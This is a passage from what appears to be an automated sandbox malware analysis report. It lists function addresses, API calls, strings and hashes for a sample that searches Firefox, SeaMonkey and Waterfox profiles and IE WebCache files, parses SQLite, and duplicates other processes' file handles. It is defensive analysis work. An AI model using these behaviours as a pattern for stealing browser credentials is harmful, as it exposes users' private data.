                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                                                Control-flow Graph

                                                                APIs
                                                                • memset.MSVCRT ref: 00403CBF
                                                                • memset.MSVCRT ref: 00403CD4
                                                                • memset.MSVCRT ref: 00403CE9
                                                                • memset.MSVCRT ref: 00403CFE
                                                                • memset.MSVCRT ref: 00403D13
                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 00403DDA
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                • API String ID: 4039892925-11920434
                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                Control-flow Graph

                                                                APIs
                                                                • memset.MSVCRT ref: 00403E50
                                                                • memset.MSVCRT ref: 00403E65
                                                                • memset.MSVCRT ref: 00403E7A
                                                                • memset.MSVCRT ref: 00403E8F
                                                                • memset.MSVCRT ref: 00403EA4
                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 00403F6B
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                • API String ID: 4039892925-2068335096
                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                APIs
                                                                • memset.MSVCRT ref: 00403FE1
                                                                • memset.MSVCRT ref: 00403FF6
                                                                • memset.MSVCRT ref: 0040400B
                                                                • memset.MSVCRT ref: 00404020
                                                                • memset.MSVCRT ref: 00404035
                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 004040FC
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                • API String ID: 4039892925-3369679110
                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                • API String ID: 3510742995-2641926074
                                                                • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@CreateErrorFileLast
                                                                • String ID: |A
                                                                • API String ID: 4200628931-1717621600
                                                                • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                APIs
                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                • memset.MSVCRT ref: 004033B7
                                                                • memcpy.MSVCRT ref: 004033D0
                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                • String ID: $0.@
                                                                • API String ID: 3030842498-1896041820
                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                APIs
                                                                • memset.MSVCRT ref: 00403C09
                                                                • memset.MSVCRT ref: 00403C1E
                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                • wcscat.MSVCRT ref: 00403C47
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • wcscat.MSVCRT ref: 00403C70
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                • API String ID: 1534475566-1174173950
                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 669240632-0
                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                APIs
                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                • memset.MSVCRT ref: 00414C87
                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                • API String ID: 2925649097-2036018995
                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                APIs
                                                                • wcschr.MSVCRT ref: 00414458
                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                • String ID: "%s"
                                                                • API String ID: 1343145685-3297466227
                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                APIs
                                                                • memset.MSVCRT ref: 004087D6
                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                • memset.MSVCRT ref: 00408828
                                                                • memset.MSVCRT ref: 00408840
                                                                • memset.MSVCRT ref: 00408858
                                                                • memset.MSVCRT ref: 00408870
                                                                • memset.MSVCRT ref: 00408888
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 2911713577-0
                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID: @ $SQLite format 3
                                                                • API String ID: 1475443563-3708268960
                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmpqsort
                                                                • String ID: /nosort$/sort
                                                                • API String ID: 1579243037-1578091866
                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleModuleProcessTimes
                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                • API String ID: 116129598-3385500049
                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                APIs
                                                                • memset.MSVCRT ref: 0040E60F
                                                                • memset.MSVCRT ref: 0040E629
                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Strings
                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                • API String ID: 2887208581-2114579845
                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                APIs
                                                                • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Resource$FindLoadLockSizeof
                                                                • String ID:
                                                                • API String ID: 3473537107-0
                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                APIs
                                                                Strings
                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                • API String ID: 2221118986-1725073988
                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID: $$8
                                                                • API String ID: 1475443563-435121686
                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                APIs
                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                Memory Dump Source
